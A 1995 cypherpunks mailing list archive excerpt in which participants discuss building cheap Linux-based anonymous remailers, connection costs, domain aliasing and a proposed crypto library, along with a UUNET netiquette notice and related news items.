>>So, am I dreaming, or does this sound viable to y'all?
>
>OK, let's ponder the minimum hardware necessary,
>possible minimal configuration (Intel/clone based):
>
>(1) Case.
>(2) Power supply.
>(3) Motherboard/CPU and 4mb RAM.
>(4) Hard drive w/ controller.
>(5) modem card.

Add "standard serial port" here, for reasons I'll get into in a moment...

>(5) No monitor, keyboard, floppy, or video card.
>   (a) would require some "umbilical cord" connection to initially
>       set up from another PC.
>   (b) need to operate on "umbilical", direct and uucp modes.

The "umbilical cord" here could be a standard serial port; this could be
used in several ways.  In addition, Linux has the ability to do TCP/IP
through the parallel ports (using a LapLink-style protocol), so that could
possibly work as well.

There are a few options here:

Reuse the monitor, keyboard, etc. for each installation.

Go ahead and throw in the floppy, and set up the Linux kernel on the floppy
to use the serial port as the console instead of the monitor/keyboard.

Connect your second PC using the PLIP (that's the parallel port IP stuff)
protocol.  On the second PC, one would run a program that wouls telnet to
the first PC and run the install program, which would run via NFS on the
PLIP line.

>I am just thinking out loud here, but the hardware could be damn
>cheap (sub $500). You can find old 386 boards with 4mb right on
>the board (no SIMMs) for next to nothing (the decreasing popularity
>of 30-pin SIMMs makes this a surplus store reality, as nobody
>wants to bother to strip out the RAM chips anymore).

As far as price, I've seen 386SX motherboards run for $99.  At a going rate
of $50 per MB of RAM, buying a used MFM disk and controller for, say, $40 (I
had the option of buying a junk box full of stuff, including two 20MB drives
and a 10MB, for $100), some cheap $10 everything-board, a $70 14.4 modem,
and a power supply at $50 (here I may be way off), that adds up to... $470.
Not a bad guess!  And this assumes you pay new prices for the motherboard,
RAM, multiport, modem, and power supply...

Also, if you wanted to splurge, you could opt for a few more MB of RAM and a
CD-ROM drive.  With our recently pressed "Cypherpunk Toolkit" CD-ROMs :-)
and a boot floppy, you wouldn't necessarily need to install anything at all;
the Linux kernel could store site-specific info (entered the first time you
booted up via a cute user-friendly interface) on the floppy and load it to a
RAMdisk, mounting the CD-ROM for all the rest of the interesting stuff.  On
multipurpose systems (you only use the computer a few hours per day and run
the remailer using some store-and-forward system the rest of the time), this
wouldn't take up any hard disk space, and your remailer could conveniently
disappear with a simple Ctrl-Alt-Del and the slam of a safe door.  ("But
officer, all I have on my hard drive is DOS and Windows.  See for yourself!
I don't even have PGP here...")

You know, the more I think about this, the more ideas pop into my head.  I'd
better quit before I get dizzy...  What if the site-specific stuff on the
floppy were encrypted... or the kernel... ?  Could we use Matt Blaze's
CFS...?  Store the site-specifics on a data haven for backup... with
auto-download on bootup... notebook remailers in car trunks using RadioMail
or POP3 that have no single physical location... dynamic remailer
configuration (download your IP address and alias info, etc. from the
Remailer Server)...?  STOP THE WORLD, I WANT TO GET OFF!!!

There; that's better.

Maybe I'll play around this weekend and try building a minimal Linux
distribution (on what hard disk space :-).  Then again, maybe I won't, so
don't be bashful to play around on your own!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 19 Jan 95 12:04:37 PST
To: cypherpunks@toad.com
Subject: UUNET Customer Liaison: USENET "netiquette" Reminder
Message-ID: <9501192004.AA04647@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



It would appear that UUNET does not consider themselves to be a common
carrier any more -- they now claim the right to cut sites off for
violating netiquette.

.pm

------- Forwarded Message

From: help@uunet.uu.net (UUNET Customer Liaison)
Message-Id: <QQxzjt24313.199501191826@odin.UU.NET>
Subject: USENET "netiquette" Reminder
To: news-subscribers@uunet.uu.net
Date: Thu, 19 Jan 1995 13:26:40 -0500 (EST)

Because of recent improper use by users on AlterNet sites we are
sending out this reminder to all sites currently subscribing to news.
If you have not reviewed the accepted USENET netiquette with your users
recently we strongly suggest you take this opportunity to do so.

Before you or your users post to USENET, please take the time to learn
the rules of the environment which you are entering.  Doing so can make
the difference between creating a good name for you and your company on
the Internet or a bad one.

Please read the postings contained in news.announce.newusers to
familiarize yourself with the etiquette of USENET.  This information
may also be obtained via anonymous FTP at UUNET's archive (ftp.uu.net)
in the directory /usenet/news.answers/news-newusers-intro.Z  UUCP
customers may obtain the file via UUCP.

It is your responsibility to ensure that the users on your system are
also aware of the proper guidelines for posting to USENET.

Improper use of "netiquette", the guidelines of the USENET community,
will be viewed as a violation of the rules of a network.  This is in
violation of your contract with UUNET/AlterNet and will likely result
in your a loss of news posting privileges for your site.

Tamara Bowman			help@uunet.uu.net
Manager Technical Support 	uunet!help
UUNET Technologies, Inc.


------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 19 Jan 95 12:31:09 PST
To: tcmay@netcom.com (Timothy C. May)
Subject: Re: The Remailer Crisis
In-Reply-To: <199501191958.LAA13462@netcom15.netcom.com>
Message-ID: <9501192029.AA04709@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May says:
> What are the cheapest "live connections" (24-hour a day connections)
> available? Where I am, about $100 a month, plus whatever the local
> phone company charges for a dedicated line.

In NYC, you can get a permanent dial up slip account for $75 per month
-- no dedicated line charges because there is no dedicated line per
se. Phone charges will add an additional $12 per month.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Thu, 19 Jan 95 12:47:08 PST
To: cypherpunks@toad.com
Subject: Re: UUNET Customer Liaison: USENET "netiquette" Reminder
Message-ID: <9501192040.AA27218@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


> It would appear that UUNET does not consider themselves to be a common
> carrier any more -- they now claim the right to cut sites off for
> violating netiquette.

Strange.

First, they were never a common carrier:  they went to some legal pains
to get registered as an enhanced service provider.  I don't know what
the differences are, but when the first "Internet Porn" article by Joe
Abernathy appeared years ago, Rick wasn't worried.  He told me ESP was
better then CC, but I don't remember why (perhaps it was no FCC regulation?)

It's unclear how this new policy affects their ESP status.
	/r$





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: strick@versant.com
Date: Thu, 19 Jan 95 15:46:55 PST
To: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Subject: *.techwood.org
In-Reply-To: <ab449dd4080210041b10@[132.162.201.201]>
Message-ID: <9501192349.AA15217@versant.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

THUS SPAKE jrochkin@cs.oberlin.edu (Jonathan Rochkind):
# 
# Maybe it's time for Eric to figure out what he's going to do 
# with remailer.net.

If anyone wants a third-level domain name *.techwood.org for their
linux box, send me mail *from root* on your box, telling me what
third-level name you want.  
(Techwood.org is the Techwood Broadcasting Foundation, incorporated
under orbital law.)

Put "techwood" in your Subject: line, and mail it to me at
<strick@techwood.org> from root at your site.  I will dig you and ping
you to get your dotted quad for an A record, and I'll make an MX record
that goes only to you.

			strick




p.s.  then in your /etc/sendmail.cf put a line like this

Cz mumble.techwood.org

(if you're running a recent UCB sendmail (like version 8.6 or later))
so that your site will accept mail destined to username@mumble.techwood.org.
(and kill -1 your sendmail daemon)




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBLx75twq3IMgMJUNlAQE4JAH/Tolj835s+mLt6A2+AmH9rHIr7dUuYbZ5
VPIE4pnWn/CfQEx8DTwlKJN8Z5QlPfw/rWyahWpU/Thg7BbLypFfHg==
=N/Gq
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jalicqui@prairienet.org (Jeff Licquia)
Date: Thu, 19 Jan 95 13:52:28 PST
To: tcmay@netcom.com (Timothy C. May)
Subject: Re: The Remailer Crisis
Message-ID: <9501192150.AA14796@firefly.prairienet.org>
MIME-Version: 1.0
Content-Type: text/plain


>
>> Jeff's response is exactly what I was hoping for! The "Cypherpunks
>> distribution" version of Linux would be a great way to spread cheap
>> remailer technology on cheap Linux boxes. Hell, I might even augment
>> my Macs with one of these things!
>
>One thing I should've noted is that a Linux-based cheap remailer is
>mostly useless without a "live connection" to the Net. That's why I
>mentioned hanging these directly off The Little Garden's net (i.e.,
>putting the box in the same building as the physical net, to avoid
>expensive connections).

Not necessarily.  Imagine, for example, a FidoNet or UUCP remailer.  It
might be nice for Internet users to have some kind of mail aliasing in the
DNS for you, but it wouldn't be required by any means.  I think it would be
better to have lots of remailers with ugly addresses (like
"jeff%jtj-l.uucp@cei.com", which is my address on my Linux box at home) than
only a few with nice ones.  (FidoNet has its own problems, such as paranoid
BBSes that disallow encrypted traffic, but that's another matter.)  These
remailers wouldn't even need to be up 24 hours; you could run it at night,
calling up on bootup and every hour thereafter or something.  It's not
perfect, to be sure, but what else is perfect?

I don't know how hard it is to get in on the local FidoNet, but UUCP isn't
too hard, and is a lot cheaper.  When I was in college, my college gave me a
feed for free.  I'm not so familiar what providers charge.  Of course,
university accounts have their good and bad points; however, if you could
persuade someone offsite with control over a domain name (for example,
"remailer.net" :-) to give you a mail alias on their domain, this would take
a bit more effort to track than your typical "remailer.uiuc.edu" type
domain.  This would make it less likely that the university would hear
complaints, also, since most complainers would be more likely to complain to
"postmaster@remailer.net" than "postmaster@uiuc.edu" if your machine was
called "anon@anarchy.remailer.net" instead of "anon%anarchy.uucp@uiuc.edu"
or "anon@anarchy.uiuc.edu".

And this doesn't even get into the neato-cool new services you West Coasters
get, like RadioMail...

>What are the cheapest "live connections" (24-hour a day connections)
>available? Where I am, about $100 a month, plus whatever the local
>phone company charges for a dedicated line. ISDN is an option, but it
>looks to cost $400-800 to get started, plus a monthly charge (which I
>don't recall, except that I "gulped" when I heard it).

Around here, it isn't even available unless you access through the
CompuServe numbers or call long distance (read: $$$).  That may be changing
soon...

>So, even an el cheapo 486-based Linux box, for perhaps $800 or so,
>would need to solve the problem of a cheap, continuous connection to
>the Net. (My supposition is that one approach is to share these
>connections, hence my notion of hanging machines on other people's
>nets.)

No need for even a 486.  If it takes an hour to process a remailer script,
so much the better for the mix.  You could call it a "required latency
feature". :-)

>Are there options for several machines to share a connection? (I'm
>sure there are....). Someone who already has a connection may be
>willing to host additional machines, which could share some of the
>charges.

Set up correctly, these "Remailer-In-A-Box" type machines could do several
things to share a connection.  They could, for example, all be connected
with serial cables and use UUCP to get mail where it needs to go.  I
believe, in addition, that you can chain up to three deep with PLIP.  This
of course assumes that Ethernet isn't an option.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jml@wizard.synapse.net
Date: Thu, 19 Jan 95 13:20:22 PST
To: cypherpunks@toad.com
Subject: Internet World Magazine
Message-ID: <199501192119.QAA21262@sentinel.synapse.net>
MIME-Version: 1.0
Content-Type: text/plain


This month's issue of Internet World Magazine deals primarily with internet 
security. I'm am not going to review everything in the mag but I'll list the 
table of content:

Better Safe:
Danger lurks on the Info Highway. You must take precaution to reduce your riks.
By Dave Taylor and Rosalind Resnick

Getting Cryptic:
Phil Zimmermann's PGP gives you powerful encryption to keep your messages 
safe from prying eyes. Read all about it.
By William Stalling.
(Introductory article about PGP. Nothing we, here, don't already know)

Securing the Enterprise:
Connectiong your corporation to the Internet can be a security nightmare.
Firewalls are the main line of defense.
By Alton Hoover
(An overview of Firewalls, application-layer gateways and token-based 
authentication schemes)

Beyond the Firewall:
The latest  firewall technology not only detects intruders, but strikes back.
By Winn Schwartau
(Very interesting article. Here are some quotes to wet your appetite:
Wouldn't it be nice if a computer system attacked from the Internet 
responded to the attack by striking back at the intruder? This is exactly 
what Sidewinder's implementation of type enforcement does.....It will detect 
the intrusion immediately....As soon as a violation occurs, a silent alarm 
is activated....sidewinder can be configured to react in any number of ways, 
once an attack has been detected...it can shut the intruder cold...(or)...it 
can invoke a mechanism that would record all the information from whence 
came the attack....By luring the attacker into a false sense of security, 
the hacker would continue trying to break in, unaware that every step was 
being recorded...

Cashing In:
As Internet commerce expands, a host of companies are vying to establish 
their system as the basis for cyberbanking and credit-card transactions.
By Lisa Morgan

Business Browser:
New versions of Mosaic with built-in encryption promise to keep your 
transactions safe.
By Richard W. Wiggins

Unlawful Entry
Crackers can feasts on your data if you fail to plug your leaky Unix system
By Aaron Weiss
(Five Ways to crack a Unix System)

It's Alive:
Although the furor has subsided, reports of Clipper's death are greatly 
exaggerated. The government's controversial eavesdropping effort lives on.
By Steven Vaughan-Nichols

Building Trust
The chief executives of Trusted Information Systems -Steve Crocker and Steve 
Walker- talk about encryption, CyberCash, Clipper, and more.
By Jeff Ubois.

All in all a rather interesting mag. Check it out.


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
wizard@alpha.c2.org
Give me the liberty to know, to utter, and to argue freely
according to conscience, above all liberties.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frissell@panix.com (Duncan Frissell)
Date: Thu, 19 Jan 95 13:25:48 PST
To: cypherpunks@toad.com
Subject: Re: The Remailer Crisis
Message-ID: <199501192123.AA29095@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 01:14 AM 1/19/95 -0800, Timothy C. May wrote:

>* I favor separating the "account that remails" from the "owner of the
>site," as I have argued in vain in the past. (Example: a willing site
>gives out or sells many accounts...each is legally separate, and each
>must be legally challenged. My longer posts dealt with this.)

I offer to pay for and operate a remailer account on any system that will
have me.

Do we have the software yet to run a remailer out of an account?

>It's time to get cracking on this crisis.

The Cable companies may come to our rescue.  Even old fuddy-duddy
Cablevision is going to be offering connections this year.  If those
connections are characterised merely as physical connections, that could
offer legal protections.

My contrib for now will be to draft an all purpose response letter to
respond to civilian and official complaints concerning remailer abuse.

DCF

- --
You know, Private Idaho brings PGP signing within about 10 keystrokes in any
Windows mailer.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLx6vUYVO4r4sgSPhAQFjzgP/ZVAonNBsZpMCg/tlWohvC7ratGTZWtCz
/WXC+Z1PAKhigdz8VhWhkPXLj/jYba1LUMBI9giNP6T9TSxMw6jjzgvs44tw4LF4
X0pF/lv9OS7GKcPw//4FyB1FKgfwpJA+mHr8gqlLrxREXv3qpHfKRuu/ecg5urmS
jwiSSKsjZhU=
=Aoq4
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Thu, 19 Jan 95 16:27:26 PST
To: cypherpunks@toad.com
Subject: Re: *.techwood.org
In-Reply-To: <9501192349.AA15217@versant.com>
Message-ID: <199501200027.QAA10644@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   # Maybe it's time for Eric to figure out what he's going to do 
   # with remailer.net.

Standardization, is what.  It's not ready, so no names yet.

   From: strick@versant.com

   If anyone wants a third-level domain name *.techwood.org for their
   linux box, send me mail *from root* on your box, telling me what
   third-level name you want.  

This is the right avenue right now for a non-.edu remailer address.
Immediate, cheap, etc.

And incidentally, it's a great idea to use a different domain name for
these services.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Thu, 19 Jan 95 16:33:41 PST
To: cypherpunks@toad.com
Subject: Re: The Remailer Crisis
In-Reply-To: <199501192123.AA29095@panix.com>
Message-ID: <199501200033.QAA10651@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: frissell@panix.com (Duncan Frissell)

   I offer to pay for and operate a remailer account on any system that will
   have me.

best.com, based in Mt. View, CA.  Mail to postmaster@best.com, or try
the other standard extensions.

I'm sure there are others.

   Do we have the software yet to run a remailer out of an account?

When I wrote the first cypherpunk remailer, this was a design
criterion.  In other words, yes.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: xpat@vm1.spcs.umn.edu
Date: Thu, 19 Jan 95 14:43:31 PST
To: cypherpunks@toad.com
Subject: AT&T IVES chip
Message-ID: <9501192243.AA21298@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



Interpretive Summary From PC Week:

"Security Chip, interface aim to assist Electronic Commerce"

AT&T IVES (Information Vending Encryption System) chip will
encrypt data, video on demand, banking, etc.

The IVES chip will be use in AT&T cable-TV-boxes this year.

It is available to OEM's for Internet data security applications.

IVES uses algorithms licensed from RSA.

No mention of any dreaded built-in peephole.

---------------------------------------------------------------------
P M Dierking |




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Thu, 19 Jan 95 16:56:16 PST
To: jcorgan@scruznet.com (Johnathan Corgan)
Subject: Re: The Remailer Crisis
In-Reply-To: <Chameleon.4.01.950119132643.jcorgan@jcorgan.sj.scruznet.com>
Message-ID: <199501200054.QAA11075@netcom21.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Johnathan Corgan wrote:

> I am currently using ISDN from my home in San Jose.  You're right in 
> that the startup costs are the barrier--even a cheap single B channel 
> (56K) terminal adapter for use with a serial port will run $300-$400
> dollars.  The telco charges are minimal in my area; $25 monthly for
> the line itself (115 Kbps async bandwidth).  Connect charges are free 
> for non peak usage, and $0.60/hour for peak usage time (0800 to 1700) 
> Mon-Fri.

Well, let's do the math. Since the remailer has to be connected at all
times, of course, this implies $162 a month in connect charges, over
and above the other charges. Or $187 a month including the line
charge. Or $2244 a year. 

This makes a "cheap Linux box" almost a moot point. This is a lot more
than I'm willing to pay to run a remailer.

(I can imagine workarounds that involve connecting at regular
intervals to pick up mail....assuming it "accumulates" somewhere (?),
but the goal of a remailer "on the Net" is what I'm after.)

> A remailer in this scenario would need to have their MX record point to
> their ISP, and process mail via POP (incoming) and SMTP (outgoing).  
> It would be straightforward to implement a timed or demand dial scenario 
> (say, every fifteen minutes) to accomplish this.  While not the ideal 
> (continuous internet connection with pure SMTP based mail transport), it
> would suffice for a moderately loaded remailer, I'd imagine.
> 
> Of course, this involves the mail subsystem of your ISP, partially
> defeating the purpose of having ubiquitous anonymous remailer "instances"
> whose operation is outside the control of an ISP.  Still, it would be
> a good start.

I agree that it's something to look at.

--Tim May



-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Thu, 19 Jan 95 17:08:28 PST
To: eric@remailer.net (Eric Hughes)
Subject: Re: The Remailer Crisis
In-Reply-To: <199501200033.QAA10651@largo.remailer.net>
Message-ID: <199501200105.RAA05837@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
>    From: frissell@panix.com (Duncan Frissell)
> 
>    I offer to pay for and operate a remailer account on any system that will
>    have me.
> 
> best.com, based in Mt. View, CA.  Mail to postmaster@best.com, or try
> the other standard extensions.
> 
> I'm sure there are others.
> 

	To my knowledge there exists 3 packages which allow you to run
a remailer out of an account. Matt Ghio's remailer, mixmaster (Lance
Cottrell?), and the simple package available on ftp.csua.berkeley.edu,
which derives from Eric and Hal's original code.

	c2.org, of course, welcomes remailers.

-- 
sameer						Voice:   510-841-2014
Network Administrator				Pager:	 510-321-1014
Community ConneXion: The NEXUS-Berkeley		Dialin:  510-549-1383
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: root <root@einstein.ssz.com>
Date: Thu, 19 Jan 95 15:42:38 PST
To: jcorgan@scruznet.com (Johnathan Corgan)
Subject: Re: The Remailer Crisis
In-Reply-To: <Chameleon.4.01.950119132643.jcorgan@jcorgan.sj.scruznet.com>
Message-ID: <199501192344.RAA03508@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text


> 
> I am currently using ISDN from my home in San Jose.  You're right in 
> that the startup costs are the barrier--even a cheap single B channel 
> (56K) terminal adapter for use with a serial port will run $300-$400
> dollars.  The telco charges are minimal in my area; $25 monthly for
> the line itself (115 Kbps async bandwidth).  Connect charges are free 
> for non peak usage, and $0.60/hour for peak usage time (0800 to 1700) 
> Mon-Fri.
>
I am also using ISDN to get my network on through Southwestern Bell.
The charges I had to deal with were:

$135 deposit (refunded in 2 years)
$73 per month line rate (2B+D)
$350 per month for ISDN connection to another system on Internet and in
     Austin there is only one system that can do this for .com sites.
     This is a commen problem all over the country I understand.
$1150 for Combinet 160 w/ NT-1 for ISDN-Ethernet bridge.
$750 for account setup and for the folks at the other end to configure.

This is a little expensive for home use but well within the means of even
small businesses. 
 
> This is the Pacific Bell "Residential" ISDN plan.  For business lines,
> it goes up to $50 monthly with $0.60/hour 24 hours a day.
>

I am lucky in that I am flat rate.
  
> In addition to this would apply any standard long distance charges that
> would apply to a particular call.
> 
 
We get charged only for the D channel traffic which is usually used for call
progress control. In general we don't use the D channel at all.
 
> This is an excellent setup for fast, cheap, INTERMITTENT connection to 
> the Internet.  My particular ISP is in Santa Cruz, with POPS in SC, SJ,
> and soon Monterey.  An unlimited connect time PPP account runs $75 monthly.
> This actually gets me a three bit subnet so that I can put five IP boxes 
> and an ISDN router on my ethernet at home.
> 

It is a clean, fast (300kbs w/ compression), and economical for a full time
feed as well. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Thu, 19 Jan 95 14:54:52 PST
To: cypherpunks@toad.com
Subject: Re: The Remailer Crisis
Message-ID: <ab449dd4080210041b10@[132.162.201.201]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:49 PM 01/19/95, Jeff Licquia wrote:
>persuade someone offsite with control over a domain name (for example,
>"remailer.net" :-) to give you a mail alias on their domain, this would take
>a bit more effort to track than your typical "remailer.uiuc.edu" type
>domain.  This would make it less likely that the university would hear
>complaints, also, since most complainers would be more likely to complain to
>"postmaster@remailer.net" than "postmaster@uiuc.edu" if your machine was
>called "anon@anarchy.remailer.net" instead of "anon%anarchy.uucp@uiuc.edu"
>or "anon@anarchy.uiuc.edu".

I was thinking of this same thing.  I'm hopefully going to have a unix box
on the net in my college dorm room soon, but I'm a bit hesitant to run a
remailer on it.   I'm a bit scared to ask whether it would be allowed, on
the "it's better to get forgiveness then permission" line of thought.  But
I'd rather avoid the potential of having to get forgiveness either.  If my
site had a "machine.remailer.net" address, there would be many benefits.
For one, I don't have to worry about some administrator coming accross a
list of anon remailers (in a Time magazine scare-tactic article, eek!), and
noticing that one of them appears to be operating from some student's dorm
room, and secondly, as Jeff says, people who complain are just going to
complain to admin@remailer.net. They aren't going to take the time to try
to figure out that my IP address is really in oberlin.edu, and complain to
postmaster@oberlin.edu.  So administration@oberlin would never even realize
I was running a remailer, and since they haven't yet made any indication
that that would be against the rules, I would be in a good position.

Maybe it's time for Eric to figure out what he's going to do with remailer.net.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Insomnia Gallumbits <cactus@hks.net>
Date: Thu, 19 Jan 95 15:01:58 PST
To: cypherpunks@toad.com
Subject: Status of GUCAPI
Message-ID: <199501192306.SAA16798@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


I'm just about done with the first part of my crypto library, the
internal generalized I/O, and largely done with the framework for the
encoding rules.  Since I haven't fully outlined what I'm doing here,
I thought I'd mention the outline in the hopes of getting some real
feedback and perhaps some random snipets of code.

In essence, what I'm building is a crypto library that takes a very general
approach with a few parameters controlling its behavior.  The idea is
to have something that anybody can drop into their mail agent and have
an easy way of using crypto and interface with existing systems such as
PGP.  A major design goal is to be backwards compatable with PGP, but
paramount is having a plug-and-play library that will be flexible enough
to meet future crypto needs.

One of the biggest problems today is that crypto libraries are chiselled out
to deal with very specific cases -- the most general I know of if is RSAREF,
which AFAIK only supports BER/DER for encoding and RSA and DES/CBC for 
encryption.  I'll grow more clueful on that, and other crypto and key
management issues, as I get to actually working on them.

The things that I've parametrized in the design are:

	- Type of I/O.  Right now, files (and fds) and a couple of memory
	 configurations	are supported.  I've made it trivial to add new
	 types of I/O as well, and there are flags to support to
	 immediate zeroing of data once it is read into the internal
	 structures.

	- Encoding of data.  There are multiple ways to encode a bytestream
	 and these methods can be nested.  For example, PGP, MIME, and
	 uuencode use their own formats.  In this library, you can specify
	 the type.  I also want to eventually put logic in (where possible)
	 to determine the type and will also use this to support various
	 compression schemes.

	- Ciphers (this is the big one).  Right now, as I've mentioned,
	 things are very haphazard.  What I want is a way to change one
	 parameter from, for example, CRTYPE_IDEA to CRTYPE_DES and
	 thus change the encryption scheme.

	- Key management.  I know of two major ways of doing things
	 right now, X.509/PEM certificates as pushed by RSADSI, and
	 PGP web-of-trust.  As far as I can tell, PEM-style certificates
	 are just a degenerate case of PGP web-of-trust.

	- Random sources.  People should be offered a pretty good source
	 of random numbers, but should also be allowed to drop in their
	 own sources.  This is going to be relatively tough on platforms
	 I don't know much about, IE Mac and PC, but I'm hoping for some
	 help on this.  I can also salvage some code from RIPEM for those.

	- Autoconfiguration to incoming messages.  People should be
	 able to open a file and have it work, even with schema added
	 to the library after the original adaption to GUCAPI.

There's some other stuff that I'm probably forgetting here, but that's
the gist of it.  The cipher code is going to be pretty simple: I'm
getting a lot of code from various places on the net;  the code exists,
it just isn't put into a form that is easy to use.  The most difficult is
going to be a generalized scheme for key management: first off, I'm probably
going to simply use PGP's web-of-trust as my model, assuming the X.509/PEM
style certificates can be treated as degenerate cases of web of trust.

I also intend to offer a GSSAPI interface to all of this, as seems
appropriate when I get to it.

This is so far all in C: I'm not a C++ convert yet and C is still the
most portable of the languages about.  Later, perhaps class libraries
can be designed around the same code.

Thoughts?  Am I wasting my time, or is this a worthwhile pursuit?
And should I find a better name than GUCAPI?

	-- Todd
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLx7wfCoZzwIn1bdtAQGIWAF9GgY29Qop9p1TEryO3oe/cFUyyBAJQtp7
yPGjEDyCvk/vtLHTAxhQoMTE98MMkPP1
=EoBl
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Thu, 19 Jan 95 15:27:14 PST
To: Derek Atkins <warlord@MIT.EDU>
Subject: Re: Electronic cash illegal?
In-Reply-To: <9501190336.AA12782@toxicwaste.media.mit.edu>
Message-ID: <Pine.SUN.3.91.950119182200.13361A-100000@thrash.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 18 Jan 1995, Derek Atkins wrote:

> The US dollar is backed by trust alone, today.

Actually, the "backing" of a fiat currency is the need to have some 
around to pay your taxes, else you go to jail.  You are taxed on many 
types of income, even if they are not directly exchanged in the fiat 
currency.  Somehow you have to get some.

This also means that higher taxes can make the currency more desirable, 
lower taxes less, higher government spending less, lower government 
spending more, etc.

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jaeson.M.Engle@josaiah.sewanee.edu (Rhys Kyraden)
Date: Thu, 19 Jan 95 16:24:37 PST
To: cypherpunks@toad.com
Subject: Re: The Remailer Crisis
Message-ID: <v01510100ab44b238a442@[152.97.12.101]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Just out of curiousity on this subject, is there any remailer software for
Macs? I think I have enough leverage and power on my campus to be able to
run a remailer here during the school months *which is when I have net
access*.  If there isn't, how hard would it be to do? Could it be done with
something like MailShare indirectly?

-----BEGIN PGP SIGNATURE-----
Version: 2.6ui

iQCVAgUBLx8CQkiLvmPjc4XdAQFS4wP/aufMYK054Ed5fZn84xLDSsXqF3+hv4jw
uQKSUl6Kv46Ek+IypX0DwI31SqasS96vosC0W/p9uPO/MFoAyp9/EdcAkH65yWSO
Gv3iQmm/j0Lx81dxTB4mjYZUdY3wJQFd4O/vY+mT9I6OmtE6lNDzYRyn9VCl7zfw
t5G67Z6+Pas=
=TosY
-----END PGP SIGNATURE-----

                                             aka:
(-: Jaeson M. Engle    ||    jme@josaiah.sewanee.edu :-)
(-:      www server: http://josaiah.sewanee.edu/         :-)
(-: It's January 29th! IT'S TIME!!! Ask me for details!:-)
(-: Finger 'jme@josaiah.sewanee.edu' for my Public :-)
                                        PGP block.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Johnathan Corgan <jcorgan@scruznet.com>
Date: Thu, 19 Jan 95 19:31:04 PST
To: Johnathan Corgan <tcmay@netcom.com>
Subject: Re: The Remailer Crisis
Message-ID: <Chameleon.4.01.950119193035.jcorgan@jcorgan.sj.scruznet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Well, let's do the math. Since the remailer has to be connected at all
>times, of course, this implies $162 a month in connect charges, over
>and above the other charges. Or $187 a month including the line
>charge. Or $2244 a year. 
>
>This makes a "cheap Linux box" almost a moot point. This is a lot more
>than I'm willing to pay to run a remailer.
>
>(I can imagine workarounds that involve connecting at regular
>intervals to pick up mail....assuming it "accumulates" somewhere (?),
>but the goal of a remailer "on the Net" is what I'm after.)

Well, yes, this is true.  My point was that reliable, fast, easy to use
bandwidth on the order of 128 Kbps is available now in some areas for
relatively cheap rates.  _With the condition_ that continuous access
is not necessary to run a remailer (as I had outlined), this could prove
to be a good jumping off ground for some remailer operators.  Sheesh, I 
could start my own on my home ethernet if I were so inclined.

The solution to the access fee problem is, of course, sharing that fee with
other payees.  Your example of putting boxes directly on TLG's network
